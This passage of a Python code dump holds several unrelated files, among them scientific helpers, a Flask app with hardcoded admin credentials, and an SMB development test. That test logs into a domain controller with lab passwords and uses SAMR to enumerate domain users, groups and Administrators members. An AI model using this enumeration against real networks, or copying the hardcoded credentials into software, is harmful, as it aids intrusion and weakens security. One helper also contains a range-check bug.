= {}\n for YY in evol.keys():\n if (mass > RangeMass[YY][0]) and (mass < RangeMass[YY][1]):\n RangeDict[YY] = True\n else:\n RangeDict[YY] = True\n \n return RangeDict\n \ndef CheckInRange(RangeDict):\n \n InRange = False\n YYOut = None\n #print AgeMatch\n for YY in AgeMatch:\n InRange = RangeDict[YY]\n if InRange:\n YYOut = YY\n break\n \n return InRange, YYOut\n\ndef getPar(mass,parname):\n\n RangeDict = checkMassRange(mass)\n InRange, YY = CheckInRange(RangeDict)\n ParVal = None\n \n mass = float(mass)\n mass_arr = np.array(evol[YY]['mass'])\n parr_arr = np.array(evol[YY][parname])\n \n if InRange:\n ParVal = np.interp(mass,mass_arr,parr_arr)\n else:\n raise NameError('mass not in range')\n \n return ParVal\n\ndef getAllPars(mass):\n \n RangeDict = checkMassRange(mass)\n InRange, YY = CheckInRange(RangeDict)\n OutDict = {}\n \n for par in evol[YY].keys():\n ParVal = getPar(mass,par)\n #if par == 'teff':\n #print mass, InRange, YY, ParVal\n #print par, ParVal\n OutDict[par] = ParVal\n\n return 
OutDict\n","sub_path":"evol.py","file_name":"evol.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"64936734","text":"from typing import List, Dict, Union\n\nimport numpy as np\n\nfrom core.models import Match, Team, Event, ScoreField\n\n\ndef to_number(num: str) -> Union[int, float]:\n try:\n return int(num)\n except ValueError:\n return float(num)\n\n\ndef calculate_oprs(matches: List[Match]) -> Dict[int, float]:\n \"\"\"Calculates the offensive potential ratings (OPRs) of each team that played in the given set of matches.\n\n Args:\n matches: A set of matches played.\n\n Returns:\n A dictionary where k is a team id and v is their OPR. Will return an empty dictionary if the match data\n matrix is singular and thus the OPR matrix cannot be solved for.\n \"\"\"\n teams = Team.objects.filter(played__in=matches).distinct()\n max_id = teams.count()\n\n d = {t.id: c for c, t in enumerate(teams)}\n b = np.zeros(max_id)\n a = np.matrix([[0 for _ in range(max_id)] for _ in range(max_id)])\n\n for match in matches:\n for blue1, red1 in zip(match.blue_played.all(), match.red_played.all()):\n for blue2, red2 in zip(match.blue_played.all(), match.red_played.all()):\n a[(d[blue1.id], d[blue2.id])] += 1\n a[(d[red1.id], d[red2.id])] += 1\n\n b[d[blue1.id]] += match.blue_score\n b[d[red1.id]] += match.red_score\n\n try:\n oprs = np.linalg.solve(a, b)\n except np.linalg.LinAlgError as e:\n print(f'Unable to solve for OPRs -- singular matrix')\n return {}\n\n return {t: oprs[i] for t, i in d.items()}\n\n\ndef jackknife_oprs(matches: List[Match]):\n matches = list(matches) # double check to convert from a QuerySet object\n oprs = []\n for m in matches:\n print(m.key)\n match_copy = matches.copy()\n match_copy.remove(m)\n oprs.append(calculate_oprs(match_copy))\n\n div = len(oprs)\n sampled_oprs = {}\n for opr in oprs:\n for team, opr_val in opr.items():\n if team not in sampled_oprs:\n sampled_oprs[team] = 0\n sampled_oprs[team] += opr_val\n\n for team, val in sampled_oprs.items():\n sampled_oprs[team] /= div\n\n return sampled_oprs\n\n\n__component_oprs_per_year = {\n 2017: {'autoFuelPoints', 'autoPoints', 'teleopFuelPoints', 'teleopRotorPoints',\n 'autoRotorPoints', 'teleopTakeoffPoints', 'totalPoints'}\n}\n\n\ndef component_oprs_at_event(event: Event) -> Dict[int, Dict[str, float]]:\n teams = event.teams.all()\n max_id = teams.count()\n coprs = {}\n\n for component in ScoreField.objects.values_list('name', flat=True).distinct():\n if component not in __component_oprs_per_year[event.year]:\n continue\n\n d = {t.id: c for c, t in enumerate(teams)}\n b = np.zeros(max_id)\n a = np.matrix([[0 for _ in range(max_id)] for _ in range(max_id)])\n\n for match in event.match_set.all():\n for blue1, red1 in zip(match.blue_played.all(), match.red_played.all()):\n for blue2, red2 in zip(match.blue_played.all(), match.red_played.all()):\n a[(d[blue1.id], d[blue2.id])] += 1\n a[(d[red1.id], d[red2.id])] += 1\n\n b[d[blue1.id]] += to_number(match.scorefield_set.get(name=component, color='blue').value)\n b[d[red1.id]] += to_number(match.scorefield_set.get(name=component, color='red').value)\n\n try:\n oprs = np.linalg.solve(a, b)\n coprs.update({component: {t: oprs[i] for t, i in d.items()}})\n except np.linalg.LinAlgError as e:\n print(f'Unable to solve for component opr for component \"{component}\"')\n coprs.update({component: {}})\n\n return 
coprs\n","sub_path":"util/maths.py","file_name":"maths.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"183923782","text":"# problem: https://www.practicepython.org/exercise/2015/11/01/25-guessing-game-two.html\nimport math\n\n\ndef round_half_up(n, decimals=0):\n multiplier = 10 ** decimals\n return math.floor(n * multiplier + 0.5) / multiplier\n\n\nprint(\"Think about a number between 0 and 100.\")\nnumber = 50\nstep = 2\n\nrun = True\nwhile run:\n attempt = input(\"Did you think about {}? Write [too low, too high or yes]: \".format(int(number)))\n step *= 2\n\n if attempt == \"too low\":\n number += round_half_up(100 / step)\n elif attempt == \"too high\":\n number -= round_half_up(100 / step)\n elif attempt == \"yes\":\n print(\"Thanks for game!\")\n run = False\n else:\n run = False\n","sub_path":"guessing-game-two.py","file_name":"guessing-game-two.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"438905372","text":"# coding=utf-8\n__author__ = 'willi'\n\nfrom flask import Flask, render_template, request, jsonify, session, abort, flash\nfrom flask.ext.basicauth import BasicAuth\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom sqlalchemy.sql.expression import func, between, or_\nfrom database import Comparison, Result\nfrom datetime import datetime, timedelta, date\nimport random\nimport string\n\n########################################################################################################################\n# Config\n########################################################################################################################\n\napp = Flask(__name__)\napp.config['DEBUG'] = False\napp.config['DATABASE_URL'] = 'sqlite:///database/tlscompare.db'\n\n# Used a flask extension for basic auth\n# https://flask-basicauth.readthedocs.org/en/latest/\napp.config['BASIC_AUTH_USERNAME'] = 'superadmin'\napp.config['BASIC_AUTH_PASSWORD'] = 'this-is-the-best-password-evar'\nbasic_auth = BasicAuth(app)\n\napp.config['DATASETS'] = ['generated-around-threshold',\n 'generated-valid-top10k',\n 'existing',\n 'pets-ws15']\napp.config['DATASET_DEFAULT'] = 'generated-valid-top10k'\n\napp.config['NEG_REASONS'] = ['mixed-content',\n 'certificate-mismatch',\n 'timeout',\n 'untrusted-certificate',\n 'no-sense']\napp.config['POS_REASONS'] = ['mixed-content',\n 'sense']\n\n# This secret key is for encrypting the cookies\napp.secret_key = 'here-should-be-a-secret-key-for-cookie-encryption'\n\n########################################################################################################################\n# Web Code\n########################################################################################################################\n\ndbsession = None\n\n\n@app.route('/')\ndef index():\n \"\"\"\n The default comparison page\n \"\"\"\n check_datset()\n check_uid()\n\n # Get new random comparison\n return render_template('comparison.html', counter=get_result_count_for_uid(session['id']))\n\n\n@app.route('/expert')\ndef expert():\n \"\"\"\n Expert page, same as comparison, but expert.html\n \"\"\"\n check_datset()\n check_uid()\n\n # Get new random comparison\n return render_template('expert.html', counter=get_result_count_for_uid(session['id']))\n\n\n@app.route('/invalid/', methods=['GET'])\ndef invalid(req_id):\n \"\"\"\n Mark a rule as 
invalid\n reason checked\n req_id checked\n \"\"\"\n try:\n int(req_id)\n except ValueError:\n abort(403)\n\n if 'id' not in session or session['id'] == \"\":\n abort(403)\n else:\n reason = request.args.get('reason', None)\n\n if reason is not None and reason not in app.config['NEG_REASONS']:\n abort(403)\n ret = save_result(session['id'], req_id, False, reason=reason)\n if not ret:\n abort(403)\n return \"\", 200\n\n\n@app.route('/valid/', methods=['GET'])\ndef valid(req_id):\n \"\"\"\n Mark a rule as valid\n req_id checked\n reason checked\n \"\"\"\n try:\n int(req_id)\n except ValueError:\n abort(403)\n\n if 'id' not in session or session['id'] == \"\":\n abort(403)\n else:\n reason = request.args.get('reason', None)\n if reason is not None and reason not in app.config['POS_REASONS']:\n abort(403)\n ret = save_result(session['id'], req_id, True, reason=reason)\n if not ret:\n abort(403)\n return \"\", 200\n\n\n@app.route('/overview')\ndef overview():\n \"\"\"\n Statistics\n \"\"\"\n check_datset()\n check_uid()\n\n return render_template('overview.html',\n hours_wasted=get_hours_wasted(),\n hourly_stats=get_results_hourly(),\n daily_stats=get_results_daily(),\n nr_results_id=get_result_count_for_uid(session['id']),\n nr_results_ip=get_result_count_for_ip(request.remote_addr),\n nr_comparisons=dbsession.query(Comparison).count(),\n nr_results=dbsession.query(Result).count(),\n # false_pos=get_false_pos_query().count(),\n # false_neg=get_false_neg_query().count(),\n nr_current_dataset=get_dataset(session['dataset']).count(),\n dataset=session['dataset'])\n\n\n@app.route('/comparison')\ndef get_random_comparison_json():\n\n check_uid()\n check_datset()\n\n query = dbsession.query(Comparison, func.count(Result.id).label('c'))\n subquery = filter_dataset(query, session['dataset']).outerjoin(Result).group_by(Comparison.id).subquery()\n min_results = dbsession.query(func.min(subquery.c.c)).scalar()\n comp = get_dataset(session['dataset']).outerjoin(Result).group_by(Comparison.id).having(func.count(Result.id) == min_results).order_by(func.random()).first()\n\n req_id = generate_request(session['id'], comp.id)\n\n return jsonify({'http_url': comp.http_url, 'https_url': comp.https_url, 'rid': req_id})\n\n\n@app.route('/dataset/', methods=['GET'])\ndef set_dataset(dataset_id):\n \"\"\"\n Change a dataset in the session\n dataset_id checked\n \"\"\"\n if dataset_id in app.config['DATASETS']:\n session['dataset'] = dataset_id\n return dataset_id\n else:\n abort(403)\n\n@app.route('/student/', methods=['GET'])\ndef set_student(matnr):\n \"\"\"\n Set the matnr to the session\n This is only allowed once per session -> Otherwise the student has to close the browser and do it again\n It takes matnr up to 16 chars -> we could use other ids instead of matnr\n Then set the dataset to pets-ws15\n matnr overwrites other dataset settings, see check_datset()\n the filter of pets-ws15 is defined in filter_dataset()\n \"\"\"\n\n check_uid()\n\n if 'matnr' not in session or session['matnr'] == \"\":\n session['matnr'] = matnr[:16]\n\n session['dataset'] = 'pets-ws15'\n\n return render_template('expert.html', counter=get_result_count_for_uid(session['id']))\n\n@app.route('/student/logout')\ndef logout():\n session.clear()\n return index()\n\n@app.route('/contact')\ndef contact():\n return render_template('contact.html')\n\n\n@app.route('/faq')\ndef faq():\n return render_template('faq.html')\n\n\n@app.route('/admin')\n@basic_auth.required\ndef admin():\n return 
render_template('admin.html')\n\n\n@app.route('/results', defaults={'cid': None})\n@app.route('/results/')\n@basic_auth.required\ndef results(cid):\n\n try:\n if cid is not None:\n int(cid)\n except ValueError:\n abort(403)\n\n page = int(request.args.get('page', 0))\n q = dbsession.query(Result).join(Comparison)\n\n comparison = False\n if cid:\n q = q.filter(Result.comparison_id == cid)\n comparison = True\n\n count = q.count()\n q = q.limit(100).offset(100*page)\n\n return render_template('results.html',\n stats=q.all(),\n comparison=comparison,\n pos_reasons=app.config['POS_REASONS'],\n neg_reasons=app.config['NEG_REASONS'],\n count=count,\n page=page)\n\n\n# @app.route('/results/false_pos')\n# @basic_auth.required\n# def results_false_pos():\n# return render_template('results.html',\n# stats=get_false_pos_query().all(),\n# comparison=False,\n# pos_reasons=app.config['POS_REASONS'],\n# neg_reasons=app.config['NEG_REASONS'])\n#\n#\n# @app.route('/results/false_neg')\n# @basic_auth.required\n# def results_false_neg():\n# return render_template('results.html',\n# stats=get_false_neg_query().all(),\n# comparison=False,\n# pos_reasons=app.config['POS_REASONS'],\n# neg_reasons=app.config['NEG_REASONS'])\n\n\n@app.route('/change_reason/', methods=['GET'])\n@basic_auth.required\ndef change_reason(req_id):\n \"\"\"\n Change a reason afterwards (from results page)\n req_id checked\n reason checked\n \"\"\"\n try:\n int(req_id)\n except ValueError:\n abort(403)\n\n reason = request.args.get('reason', None)\n if reason is not None and reason not in app.config['NEG_REASONS'] and reason not in app.config['POS_REASONS']:\n abort(403)\n\n ret = change_reason_result(req_id, reason)\n if not ret:\n abort(403)\n return \"\", 200\n\n\n########################################################################################################################\n# Helper (DB and so on)\n########################################################################################################################\n\n\n# def get_false_pos_query():\n# return dbsession.query(Result).join(Comparison) \\\n# .filter(Result.validity.is_(False)) \\\n# .filter(Comparison.similarityvalue1 > THRESHOLD_SIMILARITYVALUE1) \\\n# .filter(Comparison.similarityvalue2 > THRESHOLD_SIMILARITYVALUE2)\n#\n#\n# def get_false_neg_query():\n# return dbsession.query(Result).join(Comparison)\\\n# .filter(Result.validity.is_(True))\\\n# .filter(Comparison.similarityvalue1 <= THRESHOLD_SIMILARITYVALUE1)\\\n# .filter(Comparison.similarityvalue2 <= THRESHOLD_SIMILARITYVALUE2)\n\n@app.route('/dataset_stats')\n@basic_auth.required\ndef dataset_stats():\n\n datasets = []\n\n for dataset in app.config['DATASETS']:\n\n query = dbsession.query(Comparison, func.count(Result.id).label('c'))\n subquery = filter_dataset(query, dataset).outerjoin(Result).group_by(Comparison.id).subquery()\n nr_results = dbsession.query(subquery.c.c, func.count('*')).group_by(subquery.c.c).all()\n\n datasets.append({'name': dataset,\n 'nr_comparisons': get_dataset(dataset).count(),\n 'nr_results': nr_results})\n\n return render_template('datasetstat.html',\n datasets=datasets)\n\n\ndef generate_request(uid, cid):\n r = Result(uid=uid,\n comparison_id=cid,\n req_time=datetime.now(),\n ip=request.remote_addr,\n useragent=str(request.user_agent))\n\n if 'matnr' in session:\n r.matnr = session['matnr']\n\n dbsession.add(r)\n dbsession.commit()\n return r.id\n\n\ndef save_result(uid, request_id, validity, reason=None):\n r = dbsession.query(Result).filter_by(id=request_id).first()\n if 
r is None:\n return False\n else:\n if r.validity is not None or \\\n r.uid != uid or \\\n r.ip != request.remote_addr or \\\n r.useragent != str(request.user_agent):\n return False\n if 'matnr' in session and r.matnr != session['matnr'] or \\\n 'matnr' not in session and r.matnr is not None:\n return False\n\n r.res_time = datetime.now()\n r.validity = validity\n\n if r.validity is True and reason is not None and reason not in app.config['POS_REASONS']:\n return False\n elif r.validity is False and reason is not None and reason not in app.config['NEG_REASONS']:\n return False\n\n r.reason = reason\n\n dbsession.commit()\n return True\n\n\ndef change_reason_result(request_id, reason):\n r = dbsession.query(Result).filter_by(id=request_id).first()\n\n if r.validity is True and reason is not None and reason not in app.config['POS_REASONS']:\n return False\n elif r.validity is False and reason is not None and reason not in app.config['NEG_REASONS']:\n return False\n\n r.reason = reason\n r.reason_changed = True\n\n dbsession.commit()\n return True\n\n\ndef get_result_count_for_uid(uid):\n \"\"\"\n Return the current results on the start page\n if matnr is set in session, use this\n :param uid:\n :return:\n \"\"\"\n if 'matnr' in session:\n return dbsession.query(Result).filter(Result.validity.isnot(None)).filter(Result.matnr == session['matnr']).count()\n else:\n return dbsession.query(Result).filter(Result.validity.isnot(None)).filter(Result.uid == uid).count()\n\n\ndef get_result_count_for_ip(ip):\n return dbsession.query(Result).filter(Result.validity.isnot(None)).filter(Result.ip == ip).count()\n\n\ndef get_results_daily():\n values = dbsession.query(func.date(Result.res_time).label('date'), func.count(\"*\").label('count'))\\\n .filter(Result.validity.isnot(None))\\\n .filter(Result.res_time > (date.today()-timedelta(days=30)))\\\n .group_by('date').all()\n return values\n\n\ndef get_results_hourly():\n values = dbsession.query(func.strftime('%H', Result.res_time).label('date'), func.count(\"*\").label('count'))\\\n .filter(Result.validity.isnot(None))\\\n .group_by('date').all()\n\n d = {n: 0 for n in range(24)}\n for hour, count in values:\n d[int(hour)] = count\n return d\n\n\ndef get_hours_wasted():\n return round(dbsession.query(func.sum(func.strftime('%s', Result.res_time)-func.strftime('%s', Result.req_time)))\n .filter(Result.validity.isnot(None)).first()[0]/3600.0, 3)\n\n\ndef check_uid():\n if 'id' not in session or session['id'] == \"\":\n session['id'] = get_random_id()\n\n########################################################################################################################\n# Datasets\n########################################################################################################################\n\nTHRESHOLD_SIMILARITYVALUE1 = 0.49\nTHRESHOLD_SIMILARITYVALUE2 = 0.68\n\n\ndef check_datset():\n if 'matnr' in session:\n session['dataset'] = 'pets-ws15'\n if 'dataset' not in session:\n session['dataset'] = app.config['DATASET_DEFAULT']\n\n\ndef get_dataset(dataset):\n return filter_dataset(dbsession.query(Comparison), dataset)\n\n\ndef filter_dataset(query, dataset):\n # Only https everywhere\n if dataset == \"existing\":\n return query.filter(Comparison.code == \"H\").order_by(func.random())\n # around-threshold\n # where similarityvalue1 BETWEEN 0.39 and 0.59\n # or similarityvalue2 BETWEEN 0.58 and 0.77\n # and ruleset of dominik\n elif dataset == \"generated-around-threshold\":\n return query.filter(Comparison.code == \"D\") \\\n 
.filter(or_(between(Comparison.similarityvalue1,\n THRESHOLD_SIMILARITYVALUE1 - 0.1,\n THRESHOLD_SIMILARITYVALUE1 + 0.1),\n between(Comparison.similarityvalue2,\n THRESHOLD_SIMILARITYVALUE2 - 0.1,\n THRESHOLD_SIMILARITYVALUE2 + 0.1))) \\\n .filter(Comparison.http_url.like('http://%/')) \\\n .filter(Comparison.https_url.like('https://%/')) \\\n .order_by(func.random())\n elif dataset == \"generated-valid-top10k\":\n return query.filter(Comparison.code == \"D\") \\\n .filter(Comparison.similarityvalue1 >= 0.95) \\\n .filter(Comparison.similarityvalue2 >= 0.95) \\\n .filter(Comparison.http_url.like('http://%/')) \\\n .filter(Comparison.https_url.like('https://%/')) \\\n .filter(Comparison.rank < 48890) \\\n .order_by(func.random())\n # Pure Random\n elif dataset == \"pets-ws15\":\n return query.filter(Comparison.code == \"PETS-WS15\").order_by(func.random())\n else:\n return query.order_by(func.random())\n\n\ndef get_random_id():\n return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(32))\n\n\n@app.before_request\ndef create_session():\n global dbsession\n if dbsession is None:\n engine = create_engine(app.config['DATABASE_URL'])\n dbsession = scoped_session(sessionmaker(bind=engine))\n\n\n@app.teardown_appcontext\ndef shutdown_session(_=None):\n global dbsession\n if dbsession is not None:\n dbsession.remove()\n dbsession = None\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"tlscompare.py","file_name":"tlscompare.py","file_ext":"py","file_size_in_byte":16336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"99466395","text":"# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. 
You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# This import verifies that the dependencies are available.\n\nimport concurrent.futures\nfrom dataclasses import Field, dataclass, field\nfrom typing import Iterable, List, Optional\n\nimport confluent_kafka\nfrom confluent_kafka.admin import AdminClient, ConfigResource\nfrom confluent_kafka.schema_registry.schema_registry_client import (\n Schema,\n SchemaRegistryClient,\n)\n\nfrom metadata.config.common import ConfigModel\nfrom metadata.generated.schema.api.data.createTopic import CreateTopicEntityRequest\nfrom metadata.generated.schema.entity.data.topic import SchemaType, Topic\nfrom metadata.generated.schema.entity.services.messagingService import (\n MessagingServiceType,\n)\nfrom metadata.generated.schema.type.entityReference import EntityReference\nfrom metadata.ingestion.api.common import (\n IncludeFilterPattern,\n Record,\n WorkflowContext,\n logger,\n)\nfrom metadata.ingestion.api.source import Source, SourceStatus\nfrom metadata.ingestion.ometa.openmetadata_rest import MetadataServerConfig\nfrom metadata.utils.helpers import get_messaging_service_or_create\n\n\n@dataclass\nclass KafkaSourceStatus(SourceStatus):\n topics_scanned: List[str] = field(default_factory=list)\n filtered: List[str] = field(default_factory=list)\n\n def topic_scanned(self, topic: str) -> None:\n self.topics_scanned.append(topic)\n\n def dropped(self, topic: str) -> None:\n self.filtered.append(topic)\n\n\nclass KafkaSourceConfig(ConfigModel):\n bootstrap_servers: str = \"localhost:9092\"\n schema_registry_url: str = \"http://localhost:8081\"\n consumer_config: dict = {}\n service_name: str\n service_type: str = \"Kafka\"\n filter_pattern: IncludeFilterPattern = IncludeFilterPattern.allow_all()\n\n\n@dataclass\nclass KafkaSource(Source):\n config: KafkaSourceConfig\n admin_client: AdminClient\n report: KafkaSourceStatus\n\n def __init__(\n self,\n config: KafkaSourceConfig,\n metadata_config: MetadataServerConfig,\n ctx: WorkflowContext,\n ):\n super().__init__(ctx)\n self.config = config\n self.metadata_config = metadata_config\n self.status = KafkaSourceStatus()\n self.service = get_messaging_service_or_create(\n config.service_name,\n MessagingServiceType.Kafka.name,\n config.schema_registry_url,\n config.bootstrap_servers.split(\",\"),\n metadata_config,\n )\n self.schema_registry_client = SchemaRegistryClient(\n {\"url\": self.config.schema_registry_url}\n )\n self.admin_client = AdminClient(\n {\n \"bootstrap.servers\": self.config.bootstrap_servers,\n \"session.timeout.ms\": 6000,\n }\n )\n\n @classmethod\n def create(cls, config_dict, metadata_config_dict, ctx):\n config = KafkaSourceConfig.parse_obj(config_dict)\n metadata_config = MetadataServerConfig.parse_obj(metadata_config_dict)\n return cls(config, metadata_config, ctx)\n\n def prepare(self):\n pass\n\n def next_record(self) -> Iterable[CreateTopicEntityRequest]:\n topics = self.admin_client.list_topics().topics\n for t in topics:\n if self.config.filter_pattern.included(t):\n logger.info(\"Fetching topic schema {}\".format(t))\n topic_schema = self._parse_topic_metadata(t)\n topic = CreateTopicEntityRequest(\n name=t,\n 
service=EntityReference(\n id=self.service.id, type=\"messagingService\"\n ),\n partitions=1,\n )\n if topic_schema is not None:\n topic.schemaText = topic_schema.schema_str\n if topic_schema.schema_type == \"AVRO\":\n topic.schemaType = SchemaType.Avro.name\n elif topic_schema.schema_type == \"PROTOBUF\":\n topic.schemaType = SchemaType.Protobuf.name\n elif topic_schema.schema_type == \"JSON\":\n topic.schemaType = SchemaType.JSON.name\n else:\n topic.schemaType = SchemaType.Other.name\n\n self.status.topic_scanned(topic.name.__root__)\n yield topic\n else:\n self.status.dropped(t)\n\n def _parse_topic_metadata(self, topic: str) -> Optional[Schema]:\n logger.debug(f\"topic = {topic}\")\n schema: Optional[Schema] = None\n try:\n registered_schema = self.schema_registry_client.get_latest_version(\n topic + \"-value\"\n )\n schema = registered_schema.schema\n except Exception as e:\n self.status.warning(topic, f\"failed to get schema: {e} for topic {topic}\")\n\n return schema\n\n def get_status(self):\n return self.status\n\n def close(self):\n pass\n","sub_path":"ingestion/src/metadata/ingestion/source/kafka.py","file_name":"kafka.py","file_ext":"py","file_size_in_byte":5493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"332021069","text":"import asyncio\n\nimport enum\nimport os\n\nfrom aiosmb.commons.smbcredential import SMBCredential\nfrom aiosmb.commons.smbtarget import SMBTarget\nfrom aiosmb.smbconnection import SMBConnection\nfrom aiosmb.filereader import SMBFileReader\nfrom aiosmb.commons.authenticator_builder import AuthenticatorBuilder\nfrom aiosmb.dcerpc.v5.transport.smbtransport import SMBTransport\nfrom aiosmb.dcerpc.v5.interfaces.samrmgr import SMBSAMR\n\t\t\n\t\n\n\t\t\n\nasync def filereader_test(connection_string, filename):\n\ttarget = SMBTarget.from_connection_string(connection_string)\n\tcredential = SMBCredential.from_connection_string(connection_string)\n\t\n\tspneg = AuthenticatorBuilder.to_spnego_cred(credential, target)\n\t\n\tasync with SMBConnection(spneg, target) as connection: \n\t\tawait connection.login()\n\t\t\n\t\tsamr = SMBSAMR(connection)\n\t\tawait samr.connect()\n\t\tasync for domain in samr.list_domains():\n\t\t\tprint('domain: %s' % domain)\n\t\tdomain_sid = await samr.get_domain_sid('TEST')\n\t\tprint(str(domain_sid))\n\t\tdomain_handle = await samr.open_domain(domain_sid)\n\t\tprint(domain_handle)\n\t\tasync for username in samr.list_domain_users(domain_handle):\n\t\t\tprint(username)\n\t\t\t\n\t\tasync for groupname in samr.list_domain_groups(domain_handle):\n\t\t\tprint(groupname)\n\t\t\t\n\t\t\t\n\t\tasync for sid, username in samr.enumerate_users(domain_handle):\n\t\t\tprint(username, sid)\n\t\t\t\n\t\t\t\n\t\tuser_handle = await samr.open_user(domain_handle, 1106)\n\t\tinput(user_handle)\n\t\tasync for sid in samr.get_user_group_memberships(user_handle):\n\t\t\tprint(sid)\n\t\t\n\t\t#polling local group users\n\t\tlocal_domain_sid = await samr.get_domain_sid('Builtin')\n\t\tdomain_handle = await samr.open_domain(local_domain_sid)\n\t\talias_handle = await samr.open_alias(domain_handle, 544)\n\t\tasync for sid in samr.list_alias_members(alias_handle):\n\t\t\tprint(sid)\n\t\t\n\t\nif __name__ == '__main__':\n\tconnection_string = 'TEST/victim/ntlm/password:Passw0rd!1@10.10.10.2'\t\n\t#connection_string = 'TEST/Administrator/ntlm/password:QLFbT8zkiFGlJuf0B3Qq@win2019ad.test.corp/10.10.10.2'\n\t#connection_string = 'TEST/Administrator/sspi-ntlm/password:QLFbT8zkiFGlJuf0B3Qq@win2019ad.test.corp/10.10.10.2'\n\t#connection_string = 'TEST/Administrator/kerberos/password:QLFbT8zkiFGlJuf0B3Qq@win2019ad.test.corp/10.10.10.2'\n\t#connection_string = 'TEST.corp/Administrator/sspi-kerberos@win2019ad.test.corp/10.10.10.2'\n\tfilename = '\\\\\\\\10.10.10.2\\\\Users\\\\Administrator\\\\Desktop\\\\smb_test\\\\testfile1.txt'\n\t\n\t\n\tasyncio.run(filereader_test(connection_string, filename))\n\t\n\t\n\t'TODO: TEST NT hash with ntlm!'","sub_path":"devel/test_rpc_samr.py","file_name":"test_rpc_samr.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"652199670","text":"import scipy\r\nimport numpy as np\r\nimport ibllib.pipes.histology as histology\r\nimport ibllib.atlas as atlas\r\n\r\nbrain_atlas = atlas.AllenAtlas(25)\r\nTIP_SIZE_UM = 200\r\n\r\n\r\ndef _cumulative_distance(xyz):\r\n return np.cumsum(np.r_[0, np.sqrt(np.sum(np.diff(xyz, axis=0) ** 2, axis=1))])\r\n\r\n\r\nclass EphysAlignment:\r\n\r\n def __init__(self, xyz_picks, chn_depths=None, track_prev=None,\r\n feature_prev=None):\r\n\r\n self.xyz_track, self.track_extent = self.get_insertion_track(xyz_picks)\r\n self.chn_depths = chn_depths\r\n if np.any(track_prev):\r\n self.track_init = track_prev\r\n self.feature_init = feature_prev\r\n else:\r\n self.track_init = np.copy(self.track_extent)\r\n self.feature_init = np.copy(self.track_extent)\r\n\r\n sampling_trk = np.arange(self.track_extent[0],\r\n self.track_extent[-1] - 10 * 1e-6, 10 * 1e-6)\r\n self.xyz_samples = histology.interpolate_along_track(self.xyz_track,\r\n sampling_trk - sampling_trk[0])\r\n\r\n self.region, self.region_label, self.region_colour, self.region_id\\\r\n = self.get_histology_regions(self.xyz_samples, sampling_trk)\r\n\r\n def get_insertion_track(self, xyz_picks):\r\n \"\"\"\r\n Extends probe trajectory from bottom of brain to upper bound of allen atlas\r\n :param xyz_picks: points defining probe trajectory in 3D space (xyz)\r\n :type xyz_picks: np.array((n, 3)) - n: no. of unique points\r\n :return xyz_track: points defining extended trajectory in 3D space (xyz)\r\n :type xyz_track: np.array((n+2, 3))\r\n :return track_extent: cumulative distance between two extremes of xyz_track (bottom of\r\n brain and top of atlas) offset by distance to probe tip\r\n :type track_extent: np.array((2))\r\n \"\"\"\r\n # Use the first and last quarter of xyz_picks to estimate the trajectory beyond xyz_picks\r\n n_picks = np.max([4, round(xyz_picks.shape[0] / 4)])\r\n traj_entry = atlas.Trajectory.fit(xyz_picks[:n_picks, :])\r\n traj_exit = atlas.Trajectory.fit(xyz_picks[-1 * n_picks:, :])\r\n # Force the entry to be on the upper z lim of the atlas to account for cases where channels\r\n # may be located above the surface of the brain\r\n entry = (traj_entry.eval_z(brain_atlas.bc.zlim))[0, :]\r\n # The exit is just below the bottom surface of the brain\r\n exit = atlas.Insertion.get_brain_exit(traj_exit, brain_atlas)\r\n exit[2] = exit[2] - 200 / 1e6\r\n\r\n xyz_track = np.r_[exit[np.newaxis, :], xyz_picks, entry[np.newaxis, :]]\r\n # Sort so that most ventral coordinate is first\r\n xyz_track = xyz_track[np.argsort(xyz_track[:, 2]), :]\r\n\r\n # Compute distance to first electrode from bottom coordinate\r\n tip_distance = _cumulative_distance(xyz_track)[1] + TIP_SIZE_UM / 1e6\r\n track_length = _cumulative_distance(xyz_track)[-1]\r\n track_extent = np.array([0, track_length]) - tip_distance\r\n\r\n return xyz_track, track_extent\r\n\r\n def get_track_and_feature(self):\r\n \"\"\"\r\n Return track, feature and xyz_track variables\r\n \"\"\"\r\n return self.feature_init, self.track_init, self.xyz_track\r\n\r\n @staticmethod\r\n def feature2track(trk, feature, track):\r\n \"\"\"\r\n Estimate new values of trk according to interpolated fit between feature and track space\r\n :param trk: points in track space to convert feature space\r\n :type trk: np.array\r\n :param feature: reference coordinates in feature space (ephys plots)\r\n :type feature: np.array((n_lines + 2)) n_lines: no. of user reference lines\r\n :param track: reference coordinates in track space (histology track)\r\n :type track: np.array((n_lines + 2))\r\n :return fcn(trk): interpolated values of trk\r\n :type fcn(trk): np.array\r\n \"\"\"\r\n\r\n fcn = scipy.interpolate.interp1d(feature, track, fill_value=\"extrapolate\")\r\n return fcn(trk)\r\n\r\n @staticmethod\r\n def track2feature(ft, feature, track):\r\n \"\"\"\r\n Estimate new values of ft according to interpolated fit between track and feature space\r\n :param ft: points in feature space to convert track space\r\n :type ft: np.array\r\n :param feature: reference coordinates in feature space (ephys plots)\r\n :type feature: np.array((n_lines + 2)) n_lines: no. of user reference lines\r\n :param track: reference coordinates in track space (histology track)\r\n :type track: np.array((n_lines + 2))\r\n :return fcn(ft): interpolated values of ft\r\n :type fcn(ft): 